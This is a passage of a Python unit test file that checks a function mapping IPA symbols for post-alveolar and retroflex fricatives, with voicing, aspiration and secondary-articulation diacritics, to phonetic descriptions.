def test_ʒ̥ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʃˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃˤ")
self.assertEqual(actual, expected)
def test_ʃ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ˤ")
self.assertEqual(actual, expected)
def test_ʃ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ˤ")
self.assertEqual(actual, expected)
def test_ʒ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ˤ")
self.assertEqual(actual, expected)
def test_ʒ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated post-alveolar fricative pulmonic egressive consonant
def test_ʃʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰ_is_the_representation_of_the_voiceless_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʃʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced post-alveolar fricative pulmonic egressive consonant
def test_ʒ_is_the_representation_of_the_voiced_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ")
self.assertEqual(actual, expected)
def test_ʃ̬_is_the_representation_of_the_voiced_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬")
self.assertEqual(actual, expected)
# voiced labialized post-alveolar fricative pulmonic egressive consonant
def test_ʒʷ_is_the_representation_of_the_voiced_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʷ")
self.assertEqual(actual, expected)
def test_ʃ̬ʷ_is_the_representation_of_the_voiced_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʒʲ_is_the_representation_of_the_voiced_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʲ")
self.assertEqual(actual, expected)
def test_ʃ̬ʲ_is_the_representation_of_the_voiced_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized post-alveolar fricative pulmonic egressive consonant
def test_ʒˠ_is_the_representation_of_the_voiced_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒˠ")
self.assertEqual(actual, expected)
def test_ʃ̬ˠ_is_the_representation_of_the_voiced_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʒˤ_is_the_representation_of_the_voiced_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒˤ")
self.assertEqual(actual, expected)
def test_ʃ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated post-alveolar fricative pulmonic egressive consonant
def test_ʒʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰ_is_the_representation_of_the_voiced_aspirated_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰʷ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰʲ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰˠ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant
def test_ʒʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒʰˤ")
self.assertEqual(actual, expected)
def test_ʒ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʃ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̬ʰˤ")
self.assertEqual(actual, expected)
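# Every expected string above follows one template: voicing, then optional
# "aspirated", then an optional secondary articulation (labialized,
# palatalized, velarized, or pharyngealized), then place, manner, and the
# airstream tail "pulmonic egressive consonant". A hypothetical helper (not
# part of the module under test) that composes such a description:
@staticmethod
def _expected_description(voicing, features, place, manner="fricative"):
    # e.g. ("voiceless", ["aspirated", "labialized"], "post-alveolar") ->
    # "voiceless aspirated labialized post-alveolar fricative pulmonic egressive consonant"
    return " ".join([voicing, *features, place, manner, "pulmonic egressive consonant"])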
# voiceless retroflex fricative pulmonic egressive consonant
def test_ʂ_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ")
self.assertEqual(actual, expected)
def test_ʂ̊_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊")
self.assertEqual(actual, expected)
def test_ʂ̥_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥")
self.assertEqual(actual, expected)
def test_ʐ̊_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊")
self.assertEqual(actual, expected)
def test_ʐ̥_is_the_representation_of_the_voiceless_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex fricative pulmonic egressive consonant
def test_ʂʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʷ")
self.assertEqual(actual, expected)
def test_ʂ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ʷ")
self.assertEqual(actual, expected)
def test_ʂ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ʷ")
self.assertEqual(actual, expected)
def test_ʐ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʷ")
self.assertEqual(actual, expected)
def test_ʐ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex fricative pulmonic egressive consonant
def test_ʂʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʲ")
self.assertEqual(actual, expected)
def test_ʂ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ʲ")
self.assertEqual(actual, expected)
def test_ʂ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ʲ")
self.assertEqual(actual, expected)
def test_ʐ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʲ")
self.assertEqual(actual, expected)
def test_ʐ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex fricative pulmonic egressive consonant
def test_ʂˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂˠ")
self.assertEqual(actual, expected)
def test_ʂ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ˠ")
self.assertEqual(actual, expected)
def test_ʂ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ˠ")
self.assertEqual(actual, expected)
def test_ʐ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ˠ")
self.assertEqual(actual, expected)
def test_ʐ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʂˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂˤ")
self.assertEqual(actual, expected)
def test_ʂ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̊ˤ")
self.assertEqual(actual, expected)
def test_ʂ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̥ˤ")
self.assertEqual(actual, expected)
def test_ʐ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ˤ")
self.assertEqual(actual, expected)
def test_ʐ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex fricative pulmonic egressive consonant
def test_ʂʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex fricative pulmonic egressive consonant
def test_ʂʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant
def test_ʂʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex fricative pulmonic egressive consonant
def test_ʂʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʂʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex fricative pulmonic egressive consonant
def test_ʐ_is_the_representation_of_the_voiced_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ")
self.assertEqual(actual, expected)
def test_ʂ̬_is_the_representation_of_the_voiced_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬")
self.assertEqual(actual, expected)
# voiced labialized retroflex fricative pulmonic egressive consonant
def test_ʐʷ_is_the_representation_of_the_voiced_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʷ")
self.assertEqual(actual, expected)
def test_ʂ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex fricative pulmonic egressive consonant
def test_ʐʲ_is_the_representation_of_the_voiced_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʲ")
self.assertEqual(actual, expected)
def test_ʂ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex fricative pulmonic egressive consonant
def test_ʐˠ_is_the_representation_of_the_voiced_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐˠ")
self.assertEqual(actual, expected)
def test_ʂ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʐˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐˤ")
self.assertEqual(actual, expected)
def test_ʂ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex fricative pulmonic egressive consonant
def test_ʐʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex fricative pulmonic egressive consonant
def test_ʐʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰʷ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex fricative pulmonic egressive consonant
def test_ʐʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰʲ")
